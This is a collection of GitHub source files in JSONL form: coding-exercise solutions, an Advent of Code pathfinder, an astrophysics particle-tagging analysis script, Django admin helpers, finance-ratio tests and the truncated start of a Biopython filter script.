+{"seq_id":"33255133464","text":"import jinja2\n\n\nclass TextModel:\n \n def __init__(self) -> None:\n self.template_path = None\n\n def text_model(self) -> str:\n ret_val = \"\"\n try:\n templateLoader = jinja2.FileSystemLoader(searchpath=\"./\")\n templateEnv = jinja2.Environment(loader=templateLoader)\n t = templateEnv.get_template(self.template_path)\n ret_val = t.render(model=self)\n except Exception as ex:\n print(ex)\n\n return ret_val","repo_name":"rodusek-v/gui-tad","sub_path":"gui/model/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73834925173","text":"class Solution:\n def lengthOfLongestSubstring(self, s: str) -> int:\n left, right, answer = 0, 0, -1\n ans = set()\n for right in range(len(s)):\n while s[right] in ans:\n ans.remove(s[left])\n left += 1\n ans.add(s[right])\n answer = max(answer, right - left + 1)\n\n if answer == -1:\n return 0\n return answer","repo_name":"kalmad99/CompetitiveProgramming","sub_path":"Week 9/longestSubstringWithoutRepeatingCharacters.py","file_name":"longestSubstringWithoutRepeatingCharacters.py","file_ext":"py","file_size_in_byte":412,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29018569165","text":"class Ninja:\n def __init__(self, first_name, last_name ,treats, pet_food, pet):\n self.first_name = first_name\n self.last_name = last_name\n self.treats = treats\n self.pet_food = pet_food\n self.pet = pet\n\n # walk() - walks the ninja's pet invoking the pet play() method\n def walk(self):\n self.pet.play()\n\n return\n\n\n # feed() - feeds the ninja's pet invoking the pet eat() method\n def feed(self):\n self.pet.eat()\n\n return\n\n\n # bathe() - cleans the ninja's pet invoking the pet noise() method\n def bathe(self):\n self.pet.noise()\n\n return\n\n\n\n\n\nclass Pet:\n def __init__(self, name , pet_type , tricks, sound):\n self.name = name\n self.type = pet_type\n self.tricks = tricks\n self.energy = 10\n self.health = 10\n self.sound = sound\n\n\n # sleep() - increases the pets energy by 25\n def sleep(self):\n self.energy += 25\n print(self.energy)\n\n return \n\n # eat() - increases the pet's energy by 5 & health by 10\n def eat(self):\n self.energy += 5\n self.health += 10\n print(self.name+\"'s health rose to \"+str(self.health)+\" and energy rose to \"+str(self.energy)+\"!\")\n\n return\n\n # play() - increases the pet's health by 5\n def play(self):\n self.health += 5\n print(self.name+\"'s health rose to \" + str(self.health) + \"!\")\n\n return\n\n # noise() - prints out the pet's sound\n def noise(self):\n print(self.sound)\n\n return\n\n\n# end of classes\n\n\n# instances\n\nrover = Pet(\"Rover\", \"Dog\", [\"Fetch\", \"Roll over\"], \"Woof!\")\nseven = Ninja(\"Seven\", \"Six\", \"cookies\", \"dry food\", rover)\n\nseven.feed()\nseven.bathe()\nseven.walk()","repo_name":"bennett33/Dojo_Pets","sub_path":"dojo_pets.py","file_name":"dojo_pets.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18029897640","text":"from random import randint\nm = [] # объявили массив\nlen = int(input('enter len: ')) # просим пользователя ввести длину массива\nfor i in range(0, len): # цикл генерации случайных чисел с повторением до длины, которую ввел пользователь\n i = randint(0, 10000) / 10\n m.append(i)\nmaximum = m.index(max(m)) # узнаём индекс максимального элемента из массива\nfor x in m:\n if m.index(x) > maximum:\n m[m.index(x)] = 0 # если индекс элемента в массиве больше максимального то зануляем его\nprint(m) #результат","repo_name":"dasha0452/homework3","sub_path":"dasha.py","file_name":"dasha.py","file_ext":"py","file_size_in_byte":743,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40204834462","text":"from aocd import get_data, submit\n\n################################################################################\n# Parse input\n\nGRID = get_data(day=12, year=2022).split(\"\\n\")\nWIDTH = len(GRID[0])\nHEIGHT = len(GRID)\n# Touch every square once plus one, should be impossible to be a \"shortest path\"\nINFINITY = (WIDTH * HEIGHT) + 1\n\n################################################################################\n# Helper Function\n\n\ndef valid_directions(x, y):\n directions = []\n\n max_value = GRID[y][x] + 1\n\n if y > 0 and max_value >= GRID[y - 1][x]:\n directions.append((0, -1))\n if y < HEIGHT - 1 and max_value >= GRID[y + 1][x]:\n directions.append((0, 1))\n if x > 0 and max_value >= GRID[y][x - 1]:\n directions.append((-1, 0))\n if x < WIDTH - 1 and max_value >= GRID[y][x + 1]:\n directions.append((1, 0))\n return directions\n\n\ndef dijkstra_multiple_targets(graph, source, targets):\n # Thanks Wikipedia, my memory is not what it used to be:\n # https://en.wikipedia.org/wiki/Dijkstra%27s_algorithm#Pseudocode\n unseen_targets = set(targets)\n dist = {}\n prev = {}\n queue = []\n for v in graph.keys():\n dist[v] = INFINITY\n prev[v] = None\n queue.append(v)\n dist[source] = 0\n\n while len(queue):\n u = min(queue, key=lambda x: dist[x])\n\n if u in targets:\n unseen_targets.remove(u)\n if len(unseen_targets) == 0:\n return min([dist[t] for t in targets])\n\n # delete u from queue\n del queue[queue.index(u)]\n\n for v in graph[u]:\n if v not in queue:\n continue\n alt = dist[u] + 1\n if alt < dist[v]:\n dist[v] = alt\n prev[v] = u\n\n return None\n\n\n################################################################################\n# Build data structures\n\nstart = None\nend = None\nfor y, row in enumerate(GRID):\n x = row.find(\"S\")\n if x != -1:\n start = (x, y)\n GRID[y] = row.replace(\"S\", \"a\")\n\n x = row.find(\"E\")\n if x != -1:\n end = (x, y)\n GRID[y] = row.replace(\"E\", \"z\")\n\n if start and end:\n break\n\nfor i, row in enumerate(GRID):\n GRID[i] = list(map(ord, row))\n\nGRID[start[1]][start[0]] = ord(\"a\")\nGRID[end[1]][end[0]] = ord(\"z\")\n\n# Invert the graph and compute all paths back from the target to all sources\n# This lets us solve A and B using the same code\ninverted_graph = {}\nstarting_points = [] # For part B\nfor y in range(HEIGHT):\n for x in range(WIDTH):\n if GRID[y][x] == ord(\"a\"):\n starting_points.append((x, y))\n # pre-populate all vertices (otherwise, use a defaultdict)\n inverted_graph[(x, y)] = []\n\nfor y in range(HEIGHT):\n for x in range(WIDTH):\n for direction in valid_directions(x, y):\n inverted_graph[(x + direction[0], y + direction[1])].append((x, y))\n\n\nsubmit(\n dijkstra_multiple_targets(inverted_graph, end, [start]),\n part=\"a\",\n day=12,\n year=2022,\n)\nsubmit(\n dijkstra_multiple_targets(inverted_graph, end, starting_points),\n part=\"b\",\n day=12,\n year=2022,\n)\n","repo_name":"dmaljovec/advent_of_code","sub_path":"2022/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":3139,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"40251285377","text":"class Solution:\n def combinationSum(self, candidates: List[int], target: int) -> List[List[int]]:\n self.result = []\n self.combinations([], 0, 0, candidates, target)\n return self.result\n\n def combinations(self, path, index, total, candidates, target):\n if total > target:\n return\n if total == target:\n self.result.append(path)\n return\n for i in range(index, len(candidates)):\n self.combinations(path+[candidates[i]], i, total+candidates[i], candidates, target)","repo_name":"Naboni/Competitive-Programming","sub_path":"combinationSum.py","file_name":"combinationSum.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16120422489","text":"# © Shahram Talei @ 2020 The University of Alabama - All rights reserved.\n#you can redistribute it and/or modify\n#it under the terms of the GNU General Public License as published by\n#the Free Software Foundation; either version 3 of the License, or\n#(at your option) any later version.\n#You should have received a copy of the GNU General Public License\n#along with this program. If not, see .\n\nimport h5py as h5\nimport numpy as np\nfrom matplotlib.legend_handler import HandlerLine2D\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport argparse\nimport math\n#import csv\n#How to use: $python AccretionV2.py HDf_tag_file FirstTagged galaxies_file merger_tree\n#example: python TagAnalysis.py StellarHalo.h5 FirstTagged.h5 gals.ascii trees_264_000\n#This works for a single halo/galaxy\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"TagFile\", type=str)\n parser.add_argument(\"FirstTag\", type=str)\n parser.add_argument(\"GalDirectory\", type=str)\n parser.add_argument(\"MergerTree\", type=str)\n args = parser.parse_args()\n #f=h5.File(\"StellarHalo.h5\",\"r\")\n TagFF=h5.File(args.TagFile,\"r\")\n TagIF=h5.File(args.FirstTag,\"r\")\n #extract halox in a specific mass range, MWish for instance\n LowerMass=1.0e12\n UpperMass=1.3e12\n NBins=6\n #\n # Galaxies\n Gals=np.genfromtxt(args.GalFile, delimiter = ',')\n Gx0=np.array(Gals[:,0])\n Gy0=np.array(Gals[:,1])\n Gz0=np.array(Gals[:,2])\n GMv0=np.array(Gals[:,3])\n GRv0=np.array(Gals[:,4])\n GRd0=np.array(Gals[:,5])\n GSnap=np.array(Gals[:,6])\n datasetNames = [n for n in TagFF.keys()]\n for n in datasetNames:\n print(n)\n #Tagged Particles\n ####################################\n #Final Tag\n TagsF=TagFF['FinalTag'] # for full tag\n #halo=f['FullTag'] # for individual tags\n IDF0=TagsF['PID']\n ageF0=TagsF['Age']\n StellarMassF0=TagsF['StellarMass']\n metallicityF0=TagsF['ZZ']\n print(TagsF.shape)\n xF0=TagsF['X']\n yF0=TagsF['Y']\n zF0=TagsF['Z']\n MvF0=TagsF['Mvir']\n HindexF0=TagsF['HaloIndex']\n BEF0=TagsF['BindingEnergy']\n TreeIndexF0=TagsF['TreeIndex']\n infallMvirF0=TagsF['LastMajorMerger']\n SnapF0=TagsF['Snap']\n #\n IDF=IDF0[BEF0!=0]\n ageF=ageF0[BEF0!=0]\n StellarMassF=StellarMassF0[BEF0!=0]*(1.0e10)\n metallicityF=metallicityF0[BEF0!=0]/0.0134\n xF=xF0[BEF0!=0]\n yF=yF0[BEF0!=0]\n zF=zF0[BEF0!=0]\n MvF=MvF0[BEF0!=0]\n HindexF=HindexF0[BEF0!=0]\n TreeIndexF=TreeIndexF0[BEF0!=0]\n UTree = set(TreeIndexF)\n infallMvirF=infallMvirF0[BEF0!=0]\n #print(\"TreeIndex:%d out of %d\"%(len(UTree),len(TreeIndex0)))\n #print(UTree)\n ##Extract particles for this specific halo/galaxy\n #halo\n #dx2=(xh-x)**2.\n #dy2=(yh-y)**2.\n #dz2=(zh-z)**2.\n #the main galaxy\n #################\n #First tagged\n TagsI=TagIF['FirstTagged'] # for full tag\n #halo=f['FullTag'] # for individual tags\n IDI0=TagsI['PID']\n ageI0=TagsI['Age']\n StellarMassI0=TagsI['StellarMass']\n metallicityI0=TagsI['ZZ']\n print(TagsI.shape)\n xI0=TagsI['X']\n yI0=TagsI['Y']\n zI0=TagsI['Z']\n MvI0=TagsI['Mvir']\n HindexI0=TagsI['HaloIndex']\n BEI0=TagsI['BindingEnergy']\n TreeIndexI0=TagsI['TreeIndex']\n infallMvirI0=TagsI['LastMajorMerger']\n SnapI0=TagsI['Snap']\n #\n IDI=IDI0[BEI0!=0]\n ageI=ageI0[BEI0!=0]\n StellarMassI=StellarMassI0[BEI0!=0]#*(1.0e10) it is already converted in PtagPP\n metallicityI=metallicityI0[BEI0!=0]/0.0134\n xI=xI0[BEI0!=0]\n yI=yI0[BEI0!=0]\n zI=zI0[BEI0!=0]\n MvF=MvF0[BEI0!=0]\n HindexI=HindexI0[BEI0!=0]\n TreeIndexI=TreeIndexI0[BEI0!=0]\n UTree3 = set(TreeIndexI)\n infallMvirI=infallMvirI0[BEI0!=0]\n SnapI=SnapI0[BEI0!=0]\n ##########################\n # The main galaxy\n S=SnapF0[0]\n GMx0=Gx0[GSnap==S]\n GMx0=Gy0[GSnap==S]\n GMz0=Gz0[GSnap==S]\n GMMv0=GMv0[GSnap==S]\n GMRv0=GRv0[GSnap==S]\n GMRd0=GRd0[GSnap==S]\n Gx=GMx0[(GMv0>LowerMass) & (GMv0LowerMass) & (GMv0LowerMass) & (GMv0LowerMass) & (GMv0LowerMass) & (GMv0LowerMass) & (GMv0Rin) & (rRin) & (r0.0) & (r<0.1)]\n Z[i]=np.sum(metalBin)#/len(metalBin)\n #ax02=fig0.add_subplot(222)\n print(pMetallicity)\n print(\"z30:\")\n print(Z)\n #if not(math.isnan(met)):\n #ax02.plot(np.log10(Mvh[i]),np.log10(met))\n #print(met)\n ########\n #\n # get totals for different halos\n #min=np.min(Hindex)\n #max=np.max(Hindex)\n #print(min,max)\n print(len(x))\n print(len(StellarMass[StellarMass !=0]))\n #min max didn't work so let's find another way to get the total properities\n #checking power law distribution\n #\n #\n fig0=plt.figure(0)\n ax01=fig0.add_subplot(221)\n ax01.plot(np.log10(Rs),np.log10(Rho))\n ax01.set_xlabel(\"$log(R(kpc))$\")\n ax01.set_ylabel(\"$log(\\\\rho) [M_\\\\odot /kpc^{-3}]$\")\n ax02=fig0.add_subplot(222)\n ax02.hist(pAge,linewidth=2, bins=10, log=False,cumulative=False, histtype='step', alpha=0.9,color='blue',label='age')\n ax02.set_xlabel(\"Age\")\n ax03=fig0.add_subplot(223)\n ax03.hist(pMetallicity,linewidth=2, bins=10, log=False,cumulative=False, histtype='step', alpha=0.9,color='blue',label='metallicity')\n ax03.set_xlabel(\"Metallicity$(Z/Z_{\\\\odot})$\")\n ax04=fig0.add_subplot(224)\n ax04.plot(Rs,Z)\n #for i in range(0,len(Idh)):\n\n #\n #metalicity-halo mass dependence\n #metalicity of the halo is the average metalicity\n #\n\n print(GMv,GRv,GRd)\n print(np.sum(pStellarMass))\n # #\n #\n fig1 = plt.figure(figsize=plt.figaspect(1))\n ax = fig1.add_subplot(111, projection='3d')\n ax.scatter(px,py,pz,c='black',alpha=0.8,marker='.',s=1)\n #\n ax.set_xlabel('X (Mpc)')\n ax.set_ylabel('Y (Mpc)')\n ax.set_zlabel('Z (Mpc)')\n #\n fig2 = plt.figure(2,figsize=plt.figaspect(1))\n ax2 = fig2.add_subplot(111)#, projection='3d')\n ax2.plot(px[pTreeIndex!=0],pz[pTreeIndex!=0],'k.', markersize=1)\n #fig.set_size_inches(14,8)\n ax2.set_xlabel('X (Mpc)')\n ax2.set_ylabel('Z (Mpc)')\n #ax.set_zlabel('Z (kpc)')\n # just pick a small area to test color-map\n #x_2=x[x>17]\n #z_2=z[x>17]\n #mass_2=mass[x>17]\n #x_new=x_2[x_2<19]\n #z_new=z_2[x_2<19]\n #mass_new=mass_2[x_2<19]\n #mass_new=mass_new.reshape(len(x_new),len(z_new))\n #X, Z =np.meshgrid(x_new,z_new)\n #fig3, ax3=plt.subplots()\n fig3= plt.figure(3,figsize=plt.figaspect(1))\n #ax3=fig3.add_subplot(111)\n #ax3.contour(X,Z,mass_new)\n #viridis = cm.get_cmap('viridis', 256)#np.max(mass_new))\n #psm=ax3.pcolormesh([x_new,z_new],cmap=viridis, rasterized=True)\n #fig3.colorbar(psm,ax=ax3)\n #plot cmap = 'RdPu'\n plt.scatter(px,pz , c=np.log10(pMetallicity),cmap = 'gist_earth', s =2, alpha =0.9)\n cbar = plt.colorbar()\n plt.scatter(Gx,Gz,c='r',marker='+',alpha=0.4)\n plt.title(\"metallicity $log(Z/Z_{\\\\odot})$\")\n fig4=plt.figure(4,figsize=plt.figaspect(1))\n plt.scatter(px,pz , c=pStellarMass,cmap = 'gist_earth', s =2, alpha =0.8)\n cbar = plt.colorbar()\n plt.scatter(Gx,Gz,c='r',marker='+',alpha=0.4)\n plt.title(\"StellarMass ($M_{\\odot}$)\")\n fig5=plt.figure(5,figsize=plt.figaspect(1))\n plt.scatter(px,pz , c=pAge,cmap = 'gist_earth', s =2, alpha =0.8)\n cbar = plt.colorbar()\n plt.scatter(Gx,Gz,c='r',marker='+',alpha=0.4)\n plt.title(\"age (Gyr)\")\n # TreeIndex\n fig6=plt.figure(6,figsize=plt.figaspect(1))\n plt.scatter(px,pz , c=pTreeIndex,cmap = 'gist_earth', s =2, alpha =0.8)\n cbar = plt.colorbar()\n plt.scatter(Gx,Gz,c='r',marker='+',alpha=0.4)\n plt.title(\"Tree Index\")\n #Halo plots\n #\n\n\n plt.show()\n","repo_name":"stalei/TagAnalysis","sub_path":"AccretionV2.py","file_name":"AccretionV2.py","file_ext":"py","file_size_in_byte":9898,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73393112051","text":"from functools import wraps\nfrom itertools import chain\n\nfrom django.contrib import messages\nfrom django.contrib.admin import ModelAdmin as BaseModelAdmin\nfrom django.contrib.admin import TabularInline\nfrom django.contrib.admin.utils import unquote\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db.models import Q\nfrom django.db.models.query import QuerySet\nfrom django.http import Http404, HttpResponseRedirect\nfrom django.http.response import HttpResponseBase\nfrom django.urls import re_path, reverse\nfrom django.utils.translation import gettext_lazy as _\nfrom django.views.generic import View\nfrom django.views.generic.detail import SingleObjectMixin\nfrom django.views.generic.list import MultipleObjectMixin\n\n\nclass BaseDjangoObjectActions:\n \"\"\"\n ModelAdmin mixin to add new actions just like adding admin actions.\n\n Attributes\n ----------\n model : django.db.models.Model\n The Django Model these actions work on. This is populated by Django.\n change_actions : list of str\n Write the names of the methods of the model admin that can be used as\n tools in the change view.\n changelist_actions : list of str\n Write the names of the methods of the model admin that can be used as\n tools in the changelist view.\n tools_view_name : str\n The name of the Django Object Actions admin view, including the 'admin'\n namespace. Populated by `_get_action_urls`.\n \"\"\"\n\n change_actions = []\n changelist_actions = []\n tools_view_name = None\n\n # EXISTING ADMIN METHODS MODIFIED\n #################################\n\n def get_urls(self):\n \"\"\"Prepend `get_urls` with our own patterns.\"\"\"\n urls = super().get_urls()\n return self._get_action_urls() + urls\n\n def change_view(self, request, object_id, form_url=\"\", extra_context=None):\n extra_context = extra_context or {}\n extra_context.update(\n {\n \"objectactions\": [\n self._get_tool_dict(action) for action in self.get_change_actions(request, object_id, form_url)\n ],\n \"tools_view_name\": self.tools_view_name,\n }\n )\n return super().change_view(request, object_id, form_url, extra_context)\n\n def changelist_view(self, request, extra_context=None):\n extra_context = extra_context or {}\n extra_context.update(\n {\n \"objectactions\": [self._get_tool_dict(action) for action in self.get_changelist_actions(request)],\n \"tools_view_name\": self.tools_view_name,\n }\n )\n return super().changelist_view(request, extra_context)\n\n # USER OVERRIDABLE\n ##################\n\n def get_change_actions(self, request, object_id, form_url):\n \"\"\"\n Override this to customize what actions get to the change view.\n\n This takes the same parameters as `change_view`.\n\n For example, to restrict actions to superusers, you could do:\n\n class ChoiceAdmin(DjangoObjectActions, admin.ModelAdmin):\n def get_change_actions(self, request, **kwargs):\n if request.user.is_superuser:\n return super(ChoiceAdmin, self).get_change_actions(\n request, **kwargs\n )\n return []\n \"\"\"\n return self.change_actions\n\n def get_changelist_actions(self, request):\n \"\"\"\n Override this to customize what actions get to the changelist view.\n \"\"\"\n return self.changelist_actions\n\n # INTERNAL METHODS\n ##################\n\n def _get_action_urls(self):\n \"\"\"Get the url patterns that route each action to a view.\"\"\"\n actions = {}\n\n model_name = self.model._meta.model_name\n # e.g.: polls_poll\n base_url_name = f\"{self.model._meta.app_label}_{model_name}\"\n # e.g.: polls_poll_actions\n model_actions_url_name = \"%s_actions\" % base_url_name\n\n self.tools_view_name = \"admin:\" + model_actions_url_name\n\n # WISHLIST use get_change_actions and get_changelist_actions\n # TODO separate change and changelist actions\n for action in chain(self.change_actions, self.changelist_actions):\n actions[action] = getattr(self, action)\n return [\n # change, supports the same pks the admin does\n # https://github.com/django/django/blob/stable/1.10.x/django/contrib/admin/options.py#L555\n re_path(\n r\"^(?P.+)/actions/(?P\\w+)/$\",\n self.admin_site.admin_view( # checks permissions\n ChangeActionView.as_view(\n model=self.model,\n actions=actions,\n back=\"admin:%s_change\" % base_url_name,\n current_app=self.admin_site.name,\n )\n ),\n name=model_actions_url_name,\n ),\n # changelist\n re_path(\n r\"^actions/(?P\\w+)/$\",\n self.admin_site.admin_view( # checks permissions\n ChangeListActionView.as_view(\n model=self.model,\n actions=actions,\n back=\"admin:%s_changelist\" % base_url_name,\n current_app=self.admin_site.name,\n )\n ),\n # Dupe name is fine. https://code.djangoproject.com/ticket/14259\n name=model_actions_url_name,\n ),\n ]\n\n def _get_tool_dict(self, tool_name):\n \"\"\"Represents the tool as a dict with extra meta.\"\"\"\n tool = getattr(self, tool_name)\n standard_attrs, custom_attrs = self._get_button_attrs(tool)\n return dict(\n name=tool_name,\n label=getattr(tool, \"label\", tool_name.replace(\"_\", \" \").capitalize()),\n standard_attrs=standard_attrs,\n custom_attrs=custom_attrs,\n )\n\n def _get_button_attrs(self, tool):\n \"\"\"\n Get the HTML attributes associated with a tool.\n\n There are some standard attributes (class and title) that the template\n will always want. Any number of additional attributes can be specified\n and passed on. This is kinda awkward and due for a refactor for\n readability.\n \"\"\"\n attrs = getattr(tool, \"attrs\", {})\n # href is not allowed to be set. should an exception be raised instead?\n if \"href\" in attrs:\n attrs.pop(\"href\")\n # title is not allowed to be set. should an exception be raised instead?\n # `short_description` should be set instead to parallel django admin\n # actions\n if \"title\" in attrs:\n attrs.pop(\"title\")\n default_attrs = {\n \"class\": attrs.get(\"class\", \"\"),\n \"title\": getattr(tool, \"short_description\", \"\"),\n }\n standard_attrs = {}\n custom_attrs = {}\n for k, v in dict(default_attrs, **attrs).items():\n if k in default_attrs:\n standard_attrs[k] = v\n else:\n custom_attrs[k] = v\n return standard_attrs, custom_attrs\n\n\nclass DjangoObjectActions(BaseDjangoObjectActions):\n pass\n\n\nclass BaseActionView(View):\n \"\"\"\n The view that runs a change/changelist action callable.\n\n Attributes\n ----------\n back : str\n The urlpattern name to send users back to. This is set in\n `_get_action_urls` and turned into a url with the `back_url` property.\n model : django.db.model.Model\n The model this tool operates on.\n actions : dict\n A mapping of action names to callables.\n \"\"\"\n\n back = None\n model = None\n actions = None\n current_app = None\n\n @property\n def view_args(self):\n \"\"\"\n tuple: The argument(s) to send to the action (excluding `request`).\n\n Change actions are called with `(request, obj)` while changelist\n actions are called with `(request, queryset)`.\n \"\"\"\n raise NotImplementedError\n\n @property\n def back_url(self):\n \"\"\"\n str: The url path the action should send the user back to.\n\n If an action does not return a http response, we automagically send\n users back to either the change or the changelist page.\n \"\"\"\n raise NotImplementedError\n\n def get(self, request, tool, **kwargs):\n # Fix for case if there are special symbols in object pk\n for k, v in self.kwargs.items():\n self.kwargs[k] = unquote(v)\n\n try:\n view = self.actions[tool]\n except KeyError:\n raise Http404(\"Action does not exist\")\n\n ret = view(request, *self.view_args)\n if isinstance(ret, HttpResponseBase):\n return ret\n\n return HttpResponseRedirect(self.back_url)\n\n # HACK to allow POST requests too\n post = get\n\n def message_user(self, request, message):\n \"\"\"\n Mimic Django admin actions's `message_user`.\n\n Like the second example:\n https://docs.djangoproject.com/en/1.9/ref/contrib/admin/actions/#custom-admin-action\n \"\"\"\n messages.info(request, message)\n\n\nclass ChangeActionView(SingleObjectMixin, BaseActionView):\n @property\n def view_args(self):\n return (self.get_object(),)\n\n @property\n def back_url(self):\n return reverse(self.back, args=(self.kwargs[\"pk\"],), current_app=self.current_app)\n\n\nclass ChangeListActionView(MultipleObjectMixin, BaseActionView):\n @property\n def view_args(self):\n return (self.get_queryset(),)\n\n @property\n def back_url(self):\n return reverse(self.back, current_app=self.current_app)\n\n\ndef takes_instance_or_queryset(func):\n \"\"\"Decorator that makes standard Django admin actions compatible.\"\"\"\n\n @wraps(func)\n def decorated_function(self, request, queryset):\n # func follows the prototype documented at:\n # https://docs.djangoproject.com/en/dev/ref/contrib/admin/actions/#writing-action-functions\n if not isinstance(queryset, QuerySet):\n try:\n # Django >=1.8\n queryset = self.get_queryset(request).filter(pk=queryset.pk)\n except AttributeError:\n try:\n # Django >=1.6,<1.8\n model = queryset._meta.model\n except AttributeError: # pragma: no cover\n # Django <1.6\n model = queryset._meta.concrete_model\n queryset = model.objects.filter(pk=queryset.pk)\n return func(self, request, queryset)\n\n return decorated_function\n\n\ndef action(function=None, *, permissions=None, description=None, label=None, attrs=None):\n \"\"\"\n Conveniently add attributes to an action function:\n\n @action(\n permissions=['publish'],\n description='Mark selected stories as published',\n label='Publish'\n )\n def make_published(self, request, queryset):\n queryset.update(status='p')\n\n This is equivalent to setting some attributes (with the original, longer\n names) on the function directly:\n\n def make_published(self, request, queryset):\n queryset.update(status='p')\n make_published.allowed_permissions = ['publish']\n make_published.short_description = 'Mark selected stories as published'\n make_published.label = 'Publish'\n\n This is the django-object-actions equivalent of\n https://docs.djangoproject.com/en/stable/ref/contrib/admin/actions/#django.contrib.admin.action\n \"\"\"\n\n def decorator(func):\n if permissions is not None:\n func.allowed_permissions = permissions\n if description is not None:\n func.short_description = description\n if label is not None:\n func.label = label\n if attrs is not None:\n func.attrs = attrs\n return func\n\n if function is None:\n return decorator\n else:\n return decorator(function)\n\n\nclass GenericRelationAdmin(BaseModelAdmin):\n def formfield_for_foreignkey(self, db_field, request, **kwargs): # noqa\n if db_field.name == \"content_type\":\n if hasattr(self.model, \"BASE_MODEL_ALLOWED\"):\n q_objects = Q()\n for white_class in self.model.BASE_MODEL_ALLOWED:\n q_objects |= Q(**white_class)\n kwargs[\"queryset\"] = ContentType.objects.filter(q_objects)\n return super().formfield_for_foreignkey(db_field, request, **kwargs)\n\n\nclass ModelAdmin(BaseModelAdmin):\n ordering = (\"-created\",)\n readonly_fields = (\"created\", \"modified\")\n\n # override save_model method to add creator\n def save_model(self, request, obj, form, change):\n user = request.user\n if not obj.pk:\n obj.creator = user\n obj.last_modified_by = user\n super().save_model(request, obj, form, change)\n\n # override save_formset method to add creator\n def save_formset(self, request, form, formset, change):\n super().save_formset(request, form, formset, change)\n for _form in formset:\n if not _form.cleaned_data.get(\"DELETE\", False) and hasattr(_form.instance, \"creator\"):\n instance = _form.instance\n if instance.creator is None:\n instance.creator = request.user\n instance.last_modified_by = request.user\n instance.save()\n\n def get_list_display(self, request):\n list_display = super().get_list_display(request)\n return (\"id\",) + list_display\n\n def get_list_display_links(self, request, list_display):\n \"\"\"\n Return a sequence containing the fields to be displayed as links\n on the changelist. The list_display parameter is the list of fields\n returned by get_list_display().\n \"\"\"\n if self.list_display_links or self.list_display_links is None or not list_display:\n return self.list_display_links\n else:\n # Use only the first item in list_display as link\n return list(list_display)[0:2]\n\n\nclass MasterModelAdmin(ModelAdmin):\n date_hierarchy = \"created\"\n readonly_fields = (\"created\", \"modified\", \"creator\", \"last_modified_by\")\n\n def get_fieldsets(self, request, obj=None):\n if obj:\n return (\n (None, {\"fields\": (\"code\", \"name\", \"description\")}),\n (_(\"User Stamped\"), {\"fields\": (\"creator\", \"last_modified_by\")}),\n (_(\"Time Stamped\"), {\"fields\": (\"created\", \"modified\")}),\n )\n else:\n return ((None, {\"fields\": (\"name\", \"code\", \"description\")}),)\n\n def get_readonly_fields(self, request, obj=None):\n readonly_fields = super().get_readonly_fields(request, obj)\n if obj:\n return readonly_fields + (\"code\",) # noqa\n else:\n return readonly_fields\n\n def get_list_display(self, request):\n list_display = super().get_list_display(request)\n return list_display + (\"code\", \"is_active\")\n\n\nclass GenericRelationTabularInline(TabularInline):\n def formfield_for_foreignkey(self, db_field, request, **kwargs): # noqa\n if hasattr(self.model, \"BASE_MODEL_ALLOWED\"):\n q_objects = Q()\n for white_class in self.model.BASE_MODEL_ALLOWED:\n q_objects |= Q(**white_class)\n kwargs[\"queryset\"] = ContentType.objects.filter(q_objects)\n return super().formfield_for_foreignkey(db_field, request, **kwargs)\n","repo_name":"riso-tech/django-saas","sub_path":"one/utils/contrib/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":15656,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"33099231910","text":"import numpy\nimport pytest\n\nfrom src.measures_ratios import (\n calculate_sharpe_ratio,\n calculate_sortino_ratio,\n)\ndef test_calculate_sharpe_ratio():\n \"\"\"\n Test the calculate_sharpe_ratio function.\n \n This test checks the function's output against an expected value using predefined inputs.\n \"\"\"\n rf = 0.02\n mean_return = 0.08\n volatility = 0.15\n expected = (mean_return - rf) / volatility\n assert calculate_sharpe_ratio(mean_return, volatility, rf) == pytest.approx(expected, 1e-15)\n\ndef test_calculate_sortino_ratio():\n \"\"\"\n Test the calculate_sortino_ratio function.\n \n This test checks the function's output against expected values for both \n a zero downside standard deviation and a non-zero value.\n \"\"\"\n rf = 0.02\n mean_return = 0.08\n downside_std = 0.15\n if downside_std == 0:\n assert calculate_sortino_ratio(mean_return, downside_std, rf) is numpy.NaN\n else:\n expected = (mean_return - rf) / downside_std\n assert calculate_sortino_ratio(mean_return, downside_std, rf) == pytest.approx(expected, 1e-15)\n\ndef test_sharpe_ratio_invalid_input():\n \"\"\"\n Test the calculate_sharpe_ratio function with invalid inputs.\n \"\"\"\n with pytest.raises(TypeError):\n calculate_sharpe_ratio(\"string\", 0.2, 0.02)\n\ndef test_sortino_ratio_edge_cases():\n \"\"\"\n Test the calculate_sortino_ratio function for edge cases.\n \n Specifically, this test checks the function's behavior when the downside standard deviation is zero.\n \"\"\"\n rf = 0.02\n mean_return = 0.08\n assert calculate_sortino_ratio(mean_return, 0, rf) is numpy.NaN","repo_name":"wasimnoordin/EntroPy","sub_path":"tests/test_measures_ratios.py","file_name":"test_measures_ratios.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41093511101","text":"#!/usr/bin/env python\nfrom Bio import SeqIO\nfrom itertools import compress\nimport argparse\n\ndef get_arguments():\n parser = argparse.ArgumentParser(description='Filter a genome based on a set of given clusters',\n\t\t\t\t epilog=\"Developed by Simón Villanueva Corrales @sivico26\",\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n\n 